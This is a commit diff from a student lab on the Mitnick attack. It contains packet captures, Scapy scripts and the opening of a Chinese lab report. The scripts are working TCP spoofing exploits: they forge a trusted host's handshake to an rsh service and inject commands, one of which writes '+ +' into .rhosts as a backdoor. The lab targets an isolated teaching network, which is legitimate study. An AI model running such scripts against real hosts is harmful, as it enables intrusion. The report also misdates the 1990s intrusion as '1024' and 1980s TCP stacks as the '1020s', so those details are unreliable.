tcp and mitnick lab finished

Mitnick/Labsetup/volumes/attack_capture.txt

@@ -0,0 +1,19 @@
+tcpdump: listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+21:19:31.728151 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [S], cksum 0x0d19 (correct), seq 305419896, win 8192, length 0
+21:19:31.728207 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 44)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], cksum 0x143b (incorrect -> 0xf29d), seq 4166791008, ack 305419897, win 64240, options [mss 1460], length 0
+21:19:31.728224 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [R], cksum 0x2d16 (correct), seq 305419897, win 0, length 0
+21:19:31.737490 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [.], cksum 0xe54b (correct), seq 1, ack 1, win 8192, length 0
+21:19:31.737508 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [R], cksum 0x6e05 (correct), seq 4166791009, win 0, length 0
+21:19:31.750513 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 85)
+    10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], cksum 0x1577 (correct), seq 1:46, ack 1, win 8192, length 45
+21:19:31.750543 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
+    10.9.0.5.514 > 10.9.0.6.1023: Flags [R], cksum 0x6e05 (correct), seq 4166791009, win 0, length 0
+
+7 packets captured
+7 packets received by filter
+0 packets dropped by kernel

Mitnick/Labsetup/volumes/attack_v3.log

@@ -0,0 +1,6 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+
+0 packets captured
+0 packets received by filter
+0 packets dropped by kernel

Mitnick/Labsetup/volumes/attack_v4.log

@@ -0,0 +1,13 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+23:34:36.574238 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [S], seq 305419896, win 8192, length 0
+23:34:36.574367 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], seq 1955993133, ack 305419897, win 64240, options [mss 1460], length 0
+23:34:36.574404 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [R], seq 305419897, win 0, length 0
+23:34:36.584589 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 1, win 8192, length 0
+23:34:36.584644 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [R], seq 1955993134, win 0, length 0
+23:34:36.600097 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], seq 1:46, ack 1, win 8192, length 45
+23:34:36.600187 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [R], seq 1955993134, win 0, length 0
+
+7 packets captured
+7 packets received by filter
+0 packets dropped by kernel

Mitnick/Labsetup/volumes/mitnick_all_in_one.py

@@ -0,0 +1,56 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 1022
+
+def attack():
+    my_seq = 0x12345678
+    
+    # Send SYN
+    print("Sending SYN...")
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    send(ip/tcp, verbose=0)
+    
+    def handle_pkt(pkt):
+        nonlocal my_seq
+        if pkt.haslayer(TCP):
+            # Handshake for first connection
+            if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+                print(f"Received SYN+ACK for first connection (Seq: {pkt[TCP].seq})")
+                # Send ACK
+                ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                          TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                              seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+                send(ack_pkt, verbose=0)
+                
+                # Send Data
+                data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/success\x00"
+                data_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                           TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                               seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+                print("Sending Data...")
+                send(data_pkt, verbose=0)
+                
+            # Handshake for second connection
+            elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
+                print(f"Received SYN for second connection (Seq: {pkt[TCP].seq})")
+                # Send SYN+ACK
+                srv_seq = 0x87654321
+                sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                         TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                             seq=srv_seq, ack=pkt[TCP].seq + 1)
+                send(sa_pkt, verbose=0)
+                print("Sent SYN+ACK for second connection")
+                # We should also acknowledge the final ACK from X-Terminal if needed, 
+                # but rsh might proceed anyway.
+        return False
+
+    sniff(iface="br-63cae30f0395", filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15)
+
+if __name__ == "__main__":
+    attack()

Mitnick/Labsetup/volumes/mitnick_final.py

@@ -0,0 +1,76 @@
+#!/usr/bin/python3
+from scapy.all import *
+import time
+import threading
+
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 1022
+IFACE = "br-63cae30f0395"
+
+def mitnick_attack():
+    my_seq = 0x12345678
+    
+    # State flags
+    handshake_done = False
+    second_conn_done = False
+
+    def handle_pkt(pkt):
+        nonlocal handshake_done, second_conn_done
+        if not pkt.haslayer(TCP):
+            return
+
+        # First Connection: SYN+ACK
+        if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+            print(f"Received SYN+ACK. Seq: {pkt[TCP].seq}")
+            
+            # Send ACK
+            ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+            send(ack_pkt, verbose=0, iface=IFACE)
+            print("Sent ACK")
+            
+            # Send RSH data
+            command = "echo + + > /home/seed/.rhosts"
+            data = f"{SECOND_PORT}\x00seed\x00seed\x00{command}\x00"
+            psh_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+            send(psh_pkt, verbose=0, iface=IFACE)
+            print(f"Sent RSH data: {command}")
+            handshake_done = True
+
+        # Second Connection: SYN
+        elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
+            print(f"Received SYN for second connection. Seq: {pkt[TCP].seq}")
+            
+            # Send SYN+ACK
+            srv_seq2 = 0x99999999
+            sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                     TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                         seq=srv_seq2, ack=pkt[TCP].seq + 1)
+            send(sa_pkt, verbose=0, iface=IFACE)
+            print("Sent SYN+ACK for second connection")
+            second_conn_done = True
+
+    # Start sniffer in a thread
+    print("Starting Sniffer...")
+    t = threading.Thread(target=lambda: sniff(iface=IFACE, filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15))
+    t.start()
+    
+    time.sleep(1) # Give sniffer time to start
+    
+    # Step 1: Send spoofed SYN
+    print(f"Step 1: Sending spoofed SYN to {X_IP}:{X_PORT}")
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    send(ip/tcp, verbose=0, iface=IFACE)
+    
+    t.join()
+    print("Attack script finished.")
+
+if __name__ == "__main__":
+    mitnick_attack()

Mitnick/Labsetup/volumes/mitnick_task2_1.py

@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+from scapy.all import *
+import sys
+
+# IP Addresses
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+
+# Ports
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 9090
+
+def mitnick_attack():
+    print(f"Starting Mitnick Attack on {X_IP}...")
+    
+    # Step 1: Send spoofed SYN packet to X-Terminal
+    my_seq = 0x12345678
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    print(f"Step 1: Sending spoofed SYN from {SRV_IP}:{SRV_PORT} to {X_IP}:{X_PORT}")
+    send(ip/tcp, verbose=0)
+
+    # Step 2 & 3: Sniff SYN+ACK and respond with ACK
+    def spoof_ack(pkt):
+        if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+            print(f"Step 2: Received SYN+ACK from X-Terminal (Seq: {pkt[TCP].seq})")
+            
+            # Respond with ACK
+            ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+            print("Step 3: Sending spoofed ACK to complete handshake")
+            send(ack_pkt, verbose=0)
+            
+            # Step 4: Send rsh data
+            data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/backdoor_success\x00"
+            rsh_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+            print(f"Step 4: Sending rsh data: touch /tmp/backdoor_success")
+            send(rsh_pkt, verbose=0)
+            return True
+        return False
+
+    sniff(iface="br-63cae30f0395", filter=f"tcp and src host {X_IP} and dst port {SRV_PORT}", 
+          prn=spoof_ack, count=1, timeout=5)
+
+if __name__ == "__main__":
+    mitnick_attack()

Mitnick/Labsetup/volumes/mitnick_task2_2.py

@@ -0,0 +1,25 @@
+#!/usr/bin/python3
+from scapy.all import *
+
+# IP Addresses
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+
+# Ports
+SECOND_PORT = 9090
+
+def spoof_second_connection(pkt):
+    if pkt[TCP].flags == "S" and pkt[IP].dst == SRV_IP and pkt[TCP].dport == SECOND_PORT:
+        print(f"Received SYN for second connection from X-Terminal (Seq: {pkt[TCP].seq})")
+        
+        # Send SYN+ACK
+        my_seq = 0x87654321
+        ip = IP(src=SRV_IP, dst=X_IP)
+        tcp = TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                  seq=my_seq, ack=pkt[TCP].seq + 1)
+        print("Sending spoofed SYN+ACK for second connection")
+        send(ip/tcp, verbose=0)
+
+print(f"Waiting for second connection on port {SECOND_PORT}...")
+sniff(iface="br-63cae30f0395", filter=f"tcp and src host {X_IP} and dst port {SECOND_PORT}", 
+      prn=spoof_second_connection, count=1, timeout=20)

Mitnick/Labsetup/volumes/real_rsh_v2.txt

@@ -0,0 +1,99 @@
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on br-63cae30f0395, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+17:23:25.401435 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [S], seq 1524240127, win 64240, options [mss 1460,sackOK,TS val 1969417712 ecr 0,nop,wscale 10], length 0
+	0x0000:  4500 003c 913b 4000 4006 9564 0a09 0006  E..<.;@.@..d....
+	0x0010:  0a09 0005 03ff 0202 5ada 0eff 0000 0000  ........Z.......
+	0x0020:  a002 faf0 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  7562 edf0 0000 0000 0103 030a            ub..........
+17:23:25.401456 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [S.], seq 1861267738, ack 1524240128, win 65160, options [mss 1460,sackOK,TS val 430734879 ecr 1969417712,nop,wscale 10], length 0
+	0x0000:  4500 003c 0000 4000 4006 26a0 0a09 0005  E..<..@.@.&.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11a 5ada 0f00  ........n...Z...
+	0x0020:  a012 fe88 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  19ac 7e1f 7562 edf0 0103 030a            ..~.ub......
+17:23:25.401477 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 1, win 63, options [nop,nop,TS val 1969417712 ecr 430734879], length 0
+	0x0000:  4500 0034 913c 4000 4006 956b 0a09 0006  E..4.<@.@..k....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f00 6ef0 b11b  ........Z...n...
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf0  ...?.C......ub..
+	0x0030:  19ac 7e1f                                ..~.
+17:23:25.401509 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [P.], seq 1:21, ack 1, win 63, options [nop,nop,TS val 1969417712 ecr 430734879], length 20
+	0x0000:  4500 0048 913d 4000 4006 9556 0a09 0006  E..H.=@.@..V....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f00 6ef0 b11b  ........Z...n...
+	0x0020:  8018 003f 1457 0000 0101 080a 7562 edf0  ...?.W......ub..
+	0x0030:  19ac 7e1f 3130 3232 0073 6565 6400 7365  ..~.1022.seed.se
+	0x0040:  6564 0064 6174 6500                      ed.date.
+17:23:25.401512 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [.], ack 21, win 64, options [nop,nop,TS val 430734879 ecr 1969417712], length 0
+	0x0000:  4500 0034 e624 4000 4006 4083 0a09 0005  E..4.$@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11b 5ada 0f14  ........n...Z...
+	0x0020:  8010 0040 1443 0000 0101 080a 19ac 7e1f  ...@.C........~.
+	0x0030:  7562 edf0                                ub..
+17:23:25.403009 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [S], seq 564203822, win 64240, options [mss 1460,sackOK,TS val 996775420 ecr 0,nop,wscale 10], length 0
+	0x0000:  4500 003c f2f4 4000 4006 33ab 0a09 0005  E..<..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112e 0000 0000  ........!.......
+	0x0020:  a002 faf0 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  3b69 95fc 0000 0000 0103 030a            ;i..........
+17:23:25.403024 IP 10.9.0.6.1022 > 10.9.0.5.1023: Flags [S.], seq 3723508218, ack 564203823, win 65160, options [mss 1460,sackOK,TS val 1835098317 ecr 996775420,nop,wscale 10], length 0
+	0x0000:  4500 003c 0000 4000 4006 26a0 0a09 0006  E..<..@.@.&.....
+	0x0010:  0a09 0005 03fe 03ff ddf0 39fa 21a1 112f  ..........9.!../
+	0x0020:  a012 fe88 144b 0000 0204 05b4 0402 080a  .....K..........
+	0x0030:  6d61 60cd 3b69 95fc 0103 030a            ma`.;i......
+17:23:25.403039 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [.], ack 1, win 63, options [nop,nop,TS val 996775420 ecr 1835098317], length 0
+	0x0000:  4500 0034 f2f5 4000 4006 33b2 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112f ddf0 39fb  ........!../..9.
+	0x0020:  8010 003f 1443 0000 0101 080a 3b69 95fc  ...?.C......;i..
+	0x0030:  6d61 60cd                                ma`.
+17:23:25.403906 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [P.], seq 1:2, ack 21, win 64, options [nop,nop,TS val 430734882 ecr 1969417712], length 1
+	0x0000:  4500 0035 e625 4000 4006 4081 0a09 0005  E..5.%@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11b 5ada 0f14  ........n...Z...
+	0x0020:  8018 0040 1444 0000 0101 080a 19ac 7e22  ...@.D........~"
+	0x0030:  7562 edf0 00                             ub...
+17:23:25.403917 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 2, win 63, options [nop,nop,TS val 1969417715 ecr 430734882], length 0
+	0x0000:  4500 0034 913e 4000 4006 9569 0a09 0006  E..4.>@.@..i....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f14 6ef0 b11c  ........Z...n...
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf3  ...?.C......ub..
+	0x0030:  19ac 7e22                                ..~"
+17:23:25.403935 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [F.], seq 21, ack 2, win 63, options [nop,nop,TS val 1969417715 ecr 430734882], length 0
+	0x0000:  4500 0034 913f 4000 4006 9568 0a09 0006  E..4.?@.@..h....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f14 6ef0 b11c  ........Z...n...
+	0x0020:  8011 003f 1443 0000 0101 080a 7562 edf3  ...?.C......ub..
+	0x0030:  19ac 7e22                                ..~"
+17:23:25.405395 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [P.], seq 2:31, ack 22, win 64, options [nop,nop,TS val 430734883 ecr 1969417715], length 29
+	0x0000:  4500 0051 e626 4000 4006 4064 0a09 0005  E..Q.&@.@.@d....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b11c 5ada 0f15  ........n...Z...
+	0x0020:  8018 0040 1460 0000 0101 080a 19ac 7e23  ...@.`........~#
+	0x0030:  7562 edf3 4d6f 6e20 4d61 7920 2034 2030  ub..Mon.May..4.0
+	0x0040:  393a 3233 3a32 3520 5554 4320 3230 3236  9:23:25.UTC.2026
+	0x0050:  0a                                       .
+17:23:25.405404 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 31, win 63, options [nop,nop,TS val 1969417716 ecr 430734883], length 0
+	0x0000:  4500 0034 9140 4000 4006 9567 0a09 0006  E..4.@@.@..g....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f15 6ef0 b139  ........Z...n..9
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf4  ...?.C......ub..
+	0x0030:  19ac 7e23                                ..~#
+17:23:25.405411 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [F.], seq 1, ack 1, win 63, options [nop,nop,TS val 996775422 ecr 1835098317], length 0
+	0x0000:  4500 0034 f2f6 4000 4006 33b1 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 112f ddf0 39fb  ........!../..9.
+	0x0020:  8011 003f 1443 0000 0101 080a 3b69 95fe  ...?.C......;i..
+	0x0030:  6d61 60cd                                ma`.
+17:23:25.405447 IP 10.9.0.5.514 > 10.9.0.6.1023: Flags [F.], seq 31, ack 22, win 64, options [nop,nop,TS val 430734883 ecr 1969417716], length 0
+	0x0000:  4500 0034 e627 4000 4006 4080 0a09 0005  E..4.'@.@.@.....
+	0x0010:  0a09 0006 0202 03ff 6ef0 b139 5ada 0f15  ........n..9Z...
+	0x0020:  8011 0040 1443 0000 0101 080a 19ac 7e23  ...@.C........~#
+	0x0030:  7562 edf4                                ub..
+17:23:25.405454 IP 10.9.0.6.1023 > 10.9.0.5.514: Flags [.], ack 32, win 63, options [nop,nop,TS val 1969417716 ecr 430734883], length 0
+	0x0000:  4500 0034 9141 4000 4006 9566 0a09 0006  E..4.A@.@..f....
+	0x0010:  0a09 0005 03ff 0202 5ada 0f15 6ef0 b13a  ........Z...n..:
+	0x0020:  8010 003f 1443 0000 0101 080a 7562 edf4  ...?.C......ub..
+	0x0030:  19ac 7e23                                ..~#
+17:23:25.405468 IP 10.9.0.6.1022 > 10.9.0.5.1023: Flags [F.], seq 1, ack 2, win 64, options [nop,nop,TS val 1835098319 ecr 996775422], length 0
+	0x0000:  4500 0034 7955 4000 4006 ad52 0a09 0006  E..4yU@.@..R....
+	0x0010:  0a09 0005 03fe 03ff ddf0 39fb 21a1 1130  ..........9.!..0
+	0x0020:  8011 0040 1443 0000 0101 080a 6d61 60cf  ...@.C......ma`.
+	0x0030:  3b69 95fe                                ;i..
+17:23:25.405479 IP 10.9.0.5.1023 > 10.9.0.6.1022: Flags [.], ack 2, win 63, options [nop,nop,TS val 996775422 ecr 1835098319], length 0
+	0x0000:  4500 0034 f2f7 4000 4006 33b0 0a09 0005  E..4..@.@.3.....
+	0x0010:  0a09 0006 03ff 03fe 21a1 1130 ddf0 39fc  ........!..0..9.
+	0x0020:  8010 003f 1443 0000 0101 080a 3b69 95fe  ...?.C......;i..
+	0x0030:  6d61 60cf                                ma`.
+
+18 packets captured
+18 packets received by filter
+0 packets dropped by kernel

Mitnick/labtemplate.typ

@@ -0,0 +1,153 @@
+#let times = "Times LT Pro"
+#let times = "Times New Roman"
+#let song = (times, "Noto Serif CJK SC")
+#let hei = (times, "Noto Sans CJK SC")
+#let kai = (times, "Noto Serif CJK SC")
+#let xbsong = (times, "Noto Serif CJK SC")
+#let fsong = (times, "Noto Serif CJK SC")
+#let code = (times, "JetBrains Mono")
+#let nudtlabpaper(title: "", 
+  author: "", 
+  id: "", 
+  training_type:"",
+  grade: "",
+  major: "",
+  department: "",
+  advisor: "",
+  jobtitle: "",
+  lab: "",
+  date: "",
+  header_str: "",
+  body) = {
+  // Set the document's basic properties.
+  set document(author: author, title: title)
+  set page(
+    
+    margin: (left: 30mm, right: 30mm, top: 30mm, bottom: 30mm),
+  )
+
+  // Title row.
+  v(158pt)
+  align(center)[
+    #block(text(weight: 700, size: 30pt, font: hei, tracking: 15pt, "网络安全"))
+  ]
+  align(center)[
+    #block(text(weight: 700, size: 30pt, font: song, tracking: 15pt, "本科实验报告"))
+  ]
+
+  v(103pt)
+  pad(
+    left: 1em,
+    right: 1em,
+    grid(
+        columns: (80pt, 1fr),
+        rows: (17pt, auto),
+        text(weight: 700, size: 16pt, font: song, "实验名称："),
+        align(center, text(weight: "regular", size: 16pt, font: song, title)),
+        text(""),
+        line(length: 100%)
+    )
+    // #block(text(weight: 700, 1.75em, title))
+    // underline(text(weight: 700, size: 16pt, font: song, title))
+  )
+
+  // Author information.
+
+  v(82.5pt)
+
+  grid(
+    columns: (0.25fr, 0.25fr, 0.25fr, 0.25fr),
+    rows: (15pt, 8pt, 15pt, 8pt, 15pt, 8pt, 15pt, 8pt, 15pt),
+    text(size: 14pt, font: song, tracking: 10pt, "学员姓名"),
+    align(center, text(size: 14pt, font: song, author)),
+    text(size: 14pt, font: song, tracking: 54pt, "学号"),
+    align(center, text(size: 14pt, font: times, id)),
+    text(""),
+    line(length: 100%),
+    text(""),
+    line(length: 100%),
+    text(size: 14pt, font: song, tracking: 9pt, "培养类型"),
+    align(center, text(size: 14pt, font: song, training_type)),
+    text(size: 14pt, font: song, tracking: 54pt, "年级"),
+    align(center, text(size: 14pt, font: times, grade)),
+    text(""),
+    line(length: 100%),
+    text(""),
+    line(length: 100%),
+    text(size: 14pt, font: song, tracking: 54pt, "专业"),
+    align(center, text(size: 14pt, font: song, major)),
+    text(size: 14pt, font: song, tracking: 9pt, "所属学院"),
+    align(center, text(size: 14pt, font: song, department)),
+    text(""),
+    line(length: 100%),
+    text(""),
+    line(length: 100%),
+    text(size: 14pt, font: song, tracking: 9pt, "指导教员"),
+    align(center, text(size: 14pt, font: song, advisor)),
+    text(size: 14pt, font: song, tracking: 54pt, "职称"),
+    align(center, text(size: 14pt, font: song, jobtitle)),
+    text(""),
+    line(length: 100%),
+    text(""),
+    line(length: 100%),
+    text(size: 14pt, font: song, tracking: 20pt, "实验室"),
+    align(center, text(size: 14pt, font: song, lab)),
+    text(size: 14pt, font: song, tracking: 9pt, "实验时间"),
+    align(center, text(size: 14pt, font: song, date)),
+    text(""),
+    line(length: 100%),
+    text(""),
+    line(length: 100%),
+  )
+
+  v(50.5pt)
+  align(center, text(font: hei, size: 15pt, "国防科技大学教育训练部制"))
+
+  pagebreak()
+  
+  set page(
+    margin: (left: 30mm, right: 30mm, top: 30mm, bottom: 30mm),
+    numbering: "i",
+    number-align: center,
+  )
+
+  v(14pt)
+  align(center)[
+    #block(text(font: hei, size: 14pt, "《本科实验报告》填写说明"))
+  ]
+
+  v(14pt)
+  text("")
+  par(first-line-indent: 2em, text(font: song, size: 12pt, "实验报告内容编排应符合以下要求："))
+  
+  par(first-line-indent: 2em, text(font: fsong, size: 12pt, "（1）采用A4（21cm×29.7cm）白色复印纸，单面黑字。上下左右各侧的页边距均为3cm；缺省文档网格：字号为小4号，中文为宋体，英文和阿拉伯数字为Times New Roman，每页30行，每行36字；页脚距边界为2.5cm，页码置于页脚、居中，采用小5号阿拉伯数字从1开始连续编排，封面不编页码。"))
+
+  par(first-line-indent: 2em, text(font: fsong, size: 12pt, "（2）报告正文最多可设四级标题，字体均为黑体，第一级标题字号为4号，其余各级标题为小4号；标题序号第一级用“一、”、“二、”……，第二级用“（一）”、“（二）” ……，第三级用“1.”、“2.” ……，第四级用“（1）”、“（2）” ……，分别按序连续编排。"))
+
+  par(first-line-indent: 2em, text(font: fsong, size: 12pt, "（3）正文插图、表格中的文字字号均为5号。"))
+
+  pagebreak()
+
+  set page(
+    margin: (left: 30mm, right: 30mm, top: 30mm, bottom: 30mm),
+    numbering: "1",
+    number-align: center,
+  )
+
+  set heading(numbering: "1.1")
+  // set text(font: hei, lang: "zh")
+  
+  show heading: it => box(width: 100%)[
+    #v(0.50em)
+    #set text(font: hei)
+    #counter(heading).display()
+    // #h(0.5em)
+    #it.body
+  ]
+  // Main body.
+  set par(justify: true)
+
+  body
+}
+
+#let para(t) = par(first-line-indent: 2em, text(font: song, size: 10.5pt, t))

Mitnick/main.typ

@@ -0,0 +1,171 @@
+#import "labtemplate.typ": *
+#show: nudtlabpaper.with(title: "Mitnick 攻击实验：深度分析与复现",
+  author: "程景愉",
+  id: "202302723005",
+  training_type: "无军籍",
+  grade: "2023",
+  major: "网络工程",
+  department: "计算机学院",
+  advisor: "柳林",
+  jobtitle: "教授",
+  lab: "307-208",
+  date: "2026.05.04",
+  header_str: "《网络安全》实验报告",
+)
+#set page(header: [
+    #set par(spacing: 6pt)
+    #align(center)[#text(size: 11pt)[《网络安全》实验报告]]
+    #v(-0.3em)
+    #line(length: 100%, stroke: (thickness: 1pt))
+],)
+
+#show heading: it => box(width: 100%)[
+  #v(0.50em)
+  #counter(heading).display()
+  #it.body
+]
+
+#show raw.where(block: true): it => box(
+fill: rgb("#f5f5f5"),
+inset: (x: 12pt, y: 10pt),
+radius: 6pt,
+stroke: (thickness: 1pt, paint: rgb("#e0e0e0")),
+it
+)
+
+#outline(title: "目录", depth: 3, indent: 2em)
+#pagebreak()
+
+= 实验目的
+
+Mitnick 攻击（又称 TCP 序列号预测攻击）是网络安全史上最具代表性的复合攻击手段之一。1024 年，凯文·米特尼克通过该技术入侵了安全专家下村努的计算机。本次实验旨在通过现代虚拟化环境复现这一过程，达成以下深度目标：
+
+- *底层协议拆解*：深入理解 TCP 三次握手过程中的序列号（Sequence Number）机制，掌握其在建立连接与维护状态中的核心作用。
+- *盲目欺骗技术*：探索在无法直接观测目标响应包（Blind Injection）的极端环境下，如何通过预测机制和伪造源 IP 完成完整的 TCP 握手。
+- *信任边界分析*：剖析早期互联网协议（如 rsh/rlogin）基于主机 IP 信任的设计哲学及其在现代网络防御视野下的致命缺陷。
+- *组合攻击逻辑*：掌握 SYN Flooding、IP Spoofing 与协议逻辑漏洞利用之间的协同关系，培养体系化的网络攻击思维。
+- *工具深度应用*：通过 Scapy 库进行原始套接字编程，实现对网络数据包每一位字段的精细化控制。
+
+= 实验原理
+
+== Mitnick 攻击的体系化分析
+
+Mitnick 攻击并非单一漏洞的利用，而是对多个协议弱点和系统机制的联合绞杀。
+
+=== 1. TCP 序列号预测（ISN Prediction）
+
+在建立 TCP 连接时，双方需交换初始序列号（ISN）。在 1020 年代的 Berkeley TCP 协议栈实现中，ISN 的增长具有高度可预测性（例如每秒增加 128,000，或每个连接增加 64,000）。攻击者通过先与目标建立多次合法连接，记录返回的 ISN 并计算增量，即可推算出下一次连接时目标的 ISN 值。这使得攻击者即使收不到目标的 SYN+ACK，也能准确构造出与之匹配的 ACK 包。
+
+=== 2. 信任主机的静默化（Host Silencing）
+
+当攻击者 A 冒充信任主机 B 向目标 T 发送 SYN 时，T 会将 SYN+ACK 发送给 B。此时，若 B 处于正常状态，其协议栈会因收到未知的确认包而发送 RST 报文重置连接，导致攻击失败。Mitnick 采用 SYN Flooding 攻击使主机 B 的半连接队列（Half-open Queue）饱和，从而使其对 T 发来的报文不作响应，达到“静默”效果。
+
+=== 3. 跨协议层面的 IP 欺骗（IP Spoofing）
+
+攻击者在构造以太网帧时，将 IP 首部的源地址设为被信任主机的 IP。这要求攻击者必须处于能够发送原始包的环境中（如拥有 root 权限的原始套接字）。
+
+=== 4. rsh 协议的“二次连接”特性
+
+rsh（Remote Shell）协议在 514 端口建立主连接后，会要求客户端监听一个端口（在 payload 中指定），服务端会反向连接该端口以传输 stderr 信息。如果攻击者仅完成了主连接而未对该反向连接进行响应，rsh 会因为无法建立 stderr 管道而超时退出。
+
+= 实验环境与配置
+
+本次实验采用 Docker 容器技术构建了一个高度隔离且受控的虚拟局域网。
+
+- *网络环境*：独立子网 `10.9.0.0/24`，通过虚拟网桥连接。
+- *目标机（X-Terminal）*：IP `10.9.0.5`，运行传统的 `inetd` 超级守护进程及 `rshd` 服务。
+- *信任机（Trusted Server）*：IP `10.9.0.6`，已被目标机配置在 `.rhosts` 中。
